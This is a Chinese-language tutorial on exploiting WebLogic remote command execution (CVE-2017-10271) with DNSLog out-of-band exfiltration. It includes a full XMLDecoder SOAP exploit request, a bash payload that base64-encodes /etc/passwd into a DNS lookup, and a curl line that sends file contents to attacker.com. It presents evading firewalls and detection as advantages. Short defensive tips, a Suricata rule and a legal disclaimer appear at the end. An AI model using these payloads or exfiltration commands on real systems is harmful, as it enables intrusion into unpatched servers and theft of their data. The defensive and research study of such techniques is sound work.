weblogic命令執行如何利用dnslog進行利用

# Weblogic命令執行如何利用DNSLog進行利用

## 目錄
1. [前言](#前言)
2. [Weblogic命令執行漏洞概述](#weblogic命令執行漏洞概述)
3. [DNSLog原理簡介](#dnslog原理簡介)
4. [DNSLog在Weblogic漏洞中的利用](#dnslog在weblogic漏洞中的利用)
5. [實戰演示](#實戰演示)
6. [防御建議](#防御建議)
7. [總結](#總結)

## 前言

在網絡安全領域，Weblogic作為廣泛使用的Java應用服務器，其安全性備受關注。近年來曝光的多個命令執行漏洞（如CVE-2017-10271、CVE-2019-2725等）使得攻擊者可以在目標服務器上執行任意命令。本文將重點介紹如何通過DNSLog技術實現無回顯命令執行的驗證與利用。

## Weblogic命令執行漏洞概述

### 常見漏洞類型
1. **XML反序列化漏洞**（如CVE-2017-10271）
2. **RMI反綁定漏洞**（如CVE-2018-3191）
3. **EJB遠程代碼執行**（如CVE-2019-2725）

### 漏洞特點
- 通常通過HTTP協議觸發
- 執行上下文為Weblogic服務賬戶
- 部分漏洞存在無回顯情況

## DNSLog原理簡介

### 什么是DNSLog
DNSLog是一種利用DNS查詢記錄實現外帶數據的技術，通過讓目標服務器主動發起DNS查詢，將執行結果通過子域名傳遞到攻擊者控制的DNS服務器。

### 核心組件
1. **DNSLog平臺**（如ceye.io、dnslog.cn）
2. **多級域名解析**（利用子域名攜帶信息）
3. **日志記錄系統**（捕獲DNS查詢記錄）

### 技術優勢
- 繞過防火墻限制（通常允許DNS出站）
- 解決無回顯場景下的漏洞驗證
- 隱蔽性較高（不像HTTP請求容易被檢測）

## DNSLog在Weblogic漏洞中的利用

### 典型利用場景
1. 驗證漏洞存在性
2. 執行whoami等基礎命令
3. 外帶敏感文件內容

### 具體實現方法

#### 1. 基礎命令執行驗證
```bash
# 通過nslookup外帶命令執行結果
ping `whoami`.example.dnslog.cn

2. 數據外帶編碼方案

• Base64編碼：避免特殊字符問題
• Hex編碼：保證字符集兼容性
• 分段傳輸：處理長輸出結果

3. 常用命令構造技巧

<!-- 在XML payload中使用DNSLog -->
<command>
  <![CDATA[
    /bin/bash -c $@|/bin/bash 0<<< "ping $(cat /etc/passwd|base64|tr -d '\n').dnslog.cn"
  ]]>
</command>

實戰演示

環境準備

• 漏洞環境：Weblogic 10.3.6 (CVE-2017-10271)
• 工具：BurpSuite、DNSLog平臺
• 測試命令：nslookup

分步操作

步驟1：獲取DNSLog子域名

1. 訪問dnslog.cn獲取臨時域名

   
   example.dnslog.cn
   

步驟2：構造惡意請求

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: target.com:7001
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>ping $(whoami).example.dnslog.cn</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

步驟3：驗證結果

1. 查看DNSLog平臺
2. 出現類似記錄即成功：

   
   root.example.dnslog.cn
   

高級利用：文件內容外帶

<string>
  curl http://attacker.com/ -d "$(grep password /etc/passwd|base64)"
</string>

防御建議

臨時解決方案

1. 刪除wls-wsat等危險組件

   
   rm -rf /Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat*
   

長期防護措施

1. 及時安裝官方補丁
2. 配置網絡防火墻規則
3. 啟用Weblogic安全審計

檢測方案

# Suricata檢測規則示例
alert http any any -> any 7001 (msg:"Weblogic RCE Attempt"; 
content:"java.lang.ProcessBuilder"; 
content:"/bin/bash"; 
classtype:web-application-attack; sid:1000001;)

總結

通過DNSLog技術，安全研究人員可以： 1. 有效驗證無回顯漏洞 2. 實現數據外帶突破網絡限制 3. 提高攻擊檢測難度

附錄： - Oracle官方補丁公告 - DNSLog平臺列表 - Weblogic加固指南 “`

注：本文為技術研究文章，僅用于安全防御知識學習。實際測試請確保獲得合法授權，禁止用于非法用途。